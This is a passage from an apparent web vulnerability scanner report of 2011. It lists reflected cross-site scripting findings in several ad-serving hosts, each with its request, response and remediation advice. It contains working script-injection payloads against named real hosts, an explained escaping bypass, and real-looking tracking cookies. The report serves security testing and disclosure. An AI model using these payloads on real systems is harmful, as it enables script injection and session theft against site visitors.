var ftGUID_183799="13704C17CA7D33";
var ftConfID_183799="162490";
var ftParams_183799="click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=&cachebuster=742186.0483009368&b3805"-alert(1)-"6ebdb2ef636=1";
var ftKeyword_183799="";
var ftSegment_183799="";
var ftSegmentList_183799=[];
var ftRuleMatch_183799="0";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/xre/18/183799/231524/js
...[SNIP]...

4.89. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the frameName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c87d8'-alert(1)-'4a69ed925e5 was submitted in the frameName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26071&siteId=26072&adId=21044&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results&frameName=c87d8'-alert(1)-'4a69ed925e5&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=resultskomli_ads_frame12607126072&kltstamp=2011-9-2%2019%3A9%3A0&ranreq=0.38537488016299903&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; PUBMDCID=1; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:10:00 GMT
Content-Length: 1899
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 00:10:00 GMT; path=/
Set-Cookie: _curtime=1317600600; domain=pubmatic.com; expires=Mon, 03-Oct-2011 01:20:00 GMT; path=/
Set-Cookie: camfreq_1871838429=3663-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:50:00 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 00:10:00 GMT; path=/

document.write('<div id="c87d8'-alert(1)-'4a69ed925e5" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=12UAANhlAAA0UgAATw4AABEdAAAAAAAAAAAAAAAAAAAAAAAA8wAAAKAAAABYAgAACgAAAAAAAAACAAAANTU3ODUzMDctQTV
...[SNIP]...

4.90. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af1e4'-alert(1)-'5f597972d07 was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26071&siteId=26072&adId=21044&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=af1e4'-alert(1)-'5f597972d07&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results&frameName=http_dm_travelocity_comhtml_ngadsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=resultskomli_ads_frame12607126072&kltstamp=2011-9-2%2019%3A9%3A0&ranreq=0.38537488016299903&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; PUBMDCID=1; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8e-fips-rhel5 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:09:56 GMT
Content-Length: 1899
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 00:09:56 GMT; path=/
Set-Cookie: _curtime=1317600596; domain=pubmatic.com; expires=Mon, 03-Oct-2011 01:19:56 GMT; path=/
Set-Cookie: camfreq_760586164=3663-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:49:56 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 00:09:56 GMT; path=/

document.write('<div id="http_dm_travelocity_comhtml_ngadsize" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=12UAANhlAAA0UgAATw4AABEdAAAAAAAAA
...[SNIP]...
etFrequecy=0&kadwidth=160&kadheight=600&kadsizeid=10&kltstamp=1317600596&indirectAdId=0&adServerOptimizerId=2&ranreq=0.38537488016299903&campaignId=3663&creativeId=7441&pctr=0.000000&imprCap=1&pageURL=af1e4'-alert(1)-'5f597972d07">
...[SNIP]...

4.91. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the ranreq request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd260'-alert(1)-'54ab733c75f was submitted in the ranreq parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26071&siteId=26072&adId=21044&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results&frameName=http_dm_travelocity_comhtml_ngadsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=resultskomli_ads_frame12607126072&kltstamp=2011-9-2%2019%3A9%3A0&ranreq=0.38537488016299903bd260'-alert(1)-'54ab733c75f&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; PUBMDCID=1; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:10:03 GMT
Content-Length: 1935
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 00:10:03 GMT; path=/
Set-Cookie: _curtime=1317600603; domain=pubmatic.com; expires=Mon, 03-Oct-2011 01:20:03 GMT; path=/
Set-Cookie: camfreq_1325556632=3663-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:50:03 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 00:10:03 GMT; path=/

document.write('<div id="http_dm_travelocity_comhtml_ngadsize" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=12UAANhlAAA0UgAATw4AABEdAAAAAAAAA
...[SNIP]...
dId=21044&adServerId=243&kefact=0.620000&kpbmtpfact=1.000000&kadNetFrequecy=0&kadwidth=160&kadheight=600&kadsizeid=10&kltstamp=1317600603&indirectAdId=0&adServerOptimizerId=2&ranreq=0.38537488016299903bd260'-alert(1)-'54ab733c75f&campaignId=3663&creativeId=7441&pctr=0.000000&imprCap=1&pageURL=http://dm.travelocity.com/html.ng/adsize">
...[SNIP]...

4.92. http://static.igougo.com/traveldeals/iAuto.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://static.igougo.com
Path:   /traveldeals/iAuto.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7e7ab'%20a%3db%207cecbc91030 was submitted in the REST URL parameter 1. This input was echoed as 7e7ab' a=b 7cecbc91030 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /traveldeals7e7ab'%20a%3db%207cecbc91030/iAuto.aspx HTTP/1.1
Host: static.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=455|Accelerated|915|12|0; SL_NV12=1|12; __utmx=179047228.; __utmxx=179047228.; __unam=3de0670-132c72d397d-d7082d6-1

Response

HTTP/1.1 500 Internal Server Error
X-Strangeloop: Compression
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Expires: Mon, 03 Oct 2011 00:27:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:27:23 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 36828


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<input name="currentPage" type="hidden" value='/traveldeals7e7ab' a=b 7cecbc91030/iAuto.aspx?'/>
...[SNIP]...

4.93. http://tacoda-fatcat.search.aol.com/fa/eval [att parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda-fatcat.search.aol.com
Path:   /fa/eval

Issue detail

The value of the att request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6ca56%3balert(1)//546d6db2be8 was submitted in the att parameter. This input was echoed as 6ca56;alert(1)//546d6db2be8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fa/eval?count=10&att=application%3ATACODA_CUSTOM_TRAVEL,callback%3ATACJSONCB6ca56%3balert(1)//546d6db2be8&format=json&query=dest%20Boston%20United%20States%20date%200T3%20type%20HOTEL HTTP/1.1
Host: tacoda-fatcat.search.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_guid=2f9678d8f41740d687e7e08bd6b0682c:050911; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:13:49 GMT
Content-Type: application/json;charset=UTF-8
Content-Length: 1027
Cache-Control: max-age=3600
Expires: Mon, 03 Oct 2011 01:13:49 GMT

var _results = {"query":"dest Boston United States date 0T3 type HOTEL","count":2,"data":[{"topic":"queries","fullqueryTerm":"dest Boston United States date 0T3 type HOTEL","weight":"1000","ruleName":
...[SNIP]...
=HOTEL&fullquery=dest Boston United States date 0T3 type HOTEL","tacQueries":"TAC:CC2:Custom:Topics:Travel:PricelineTypes","queriesTerm":"HOTEL","ruleSetName":"tacoda_custom_travelmodes"}]};

TACJSONCB6ca56;alert(1)//546d6db2be8(_results);

4.94. http://tacoda-fatcat.search.aol.com/fa/eval [query parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda-fatcat.search.aol.com
Path:   /fa/eval

Issue detail

The value of the query request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d55a\"%3balert(1)//ecaf85f8f3d was submitted in the query parameter. This input was echoed as 7d55a\\";alert(1)//ecaf85f8f3d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /fa/eval?count=10&att=application%3ATACODA_CUSTOM_TRAVEL,callback%3ATACJSONCB&format=json&query=dest%20Boston%20United%20States%20date%200T3%20type%20HOTEL7d55a\"%3balert(1)//ecaf85f8f3d HTTP/1.1
Host: tacoda-fatcat.search.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_guid=2f9678d8f41740d687e7e08bd6b0682c:050911; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:01 GMT
Content-Type: application/json;charset=UTF-8
Content-Length: 654
Cache-Control: max-age=3600
Expires: Mon, 03 Oct 2011 01:14:01 GMT

var _results = {"query":"dest Boston United States date 0T3 type HOTEL7d55a\\";alert(1)//ecaf85f8f3d","count":1,"data":[{"topic":"queries","fullqueryTerm":"dest Boston United States date 0T3 type HOTEL7d55a\\";alert(1)//ecaf85f8f3d","weight":"1000","ruleName":"cc20ct0tra0rad0pline","matchedField":"de
...[SNIP]...

4.95. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the action request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84a47"%3balert(1)//e66ef953f71 was submitted in the action parameter. This input was echoed as 84a47";alert(1)//e66ef953f71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD84a47"%3balert(1)//e66ef953f71&cwrun=200&cwadformat=300X250&cwpid=538936&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=106934 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WC=59371_1_3IlqU; FC1-WCR=132981_3_3Ilow^132982_4_3Iloz; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP201
Last-Modified: Mon, 26 Sep 02011 15:35:33 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Date: Sun, 02 Oct 2011 23:49:20 GMT
Content-Length: 8858
Connection: close
Vary: Accept-Encoding
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 03-Oct-2011 02:36:00 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="538936";var cwtagid="106934";var cwadformat="300X250";var ca="VIEWAD84a47";alert(1)//e66ef953f71";var cr="200";var cw="300";var ch="250";var cads="0";var cp="538936";var ct="106934";var cf="300X250";var cn="1";var epid="";var esid="";

       String.prototype.cwcontains = function(s) {
           return(this.
...[SNIP]...

4.96. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwadformat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a8cf"%3balert(1)//78f2c95f7bc was submitted in the cwadformat parameter. This input was echoed as 2a8cf";alert(1)//78f2c95f7bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X2502a8cf"%3balert(1)//78f2c95f7bc&cwpid=538936&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=106934 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WC=59371_1_3IlqU; FC1-WCR=132981_3_3Ilow^132982_4_3Iloz; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP209
Last-Modified: Mon, 26 Sep 02011 15:53:50 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Content-Length: 8886
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:49:24 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 03-Oct-2011 02:36:04 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="538936";var cwtagid="106934";var cwadformat="300X2502a8cf";alert(1)//78f2c95f7bc";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cads="0";var cp="538936";var ct="106934";var cf="300X2502a8cf";alert(1)//78f2c95f7bc";var cn="1";var epid="";var esid="";

       String.prototyp
...[SNIP]...

4.97. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwheight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa854"%3balert(1)//0151e8bd225 was submitted in the cwheight parameter. This input was echoed as aa854";alert(1)//0151e8bd225 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=538936&cwwidth=300&cwheight=250aa854"%3balert(1)//0151e8bd225&cwpnet=1&cwtagid=106934 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
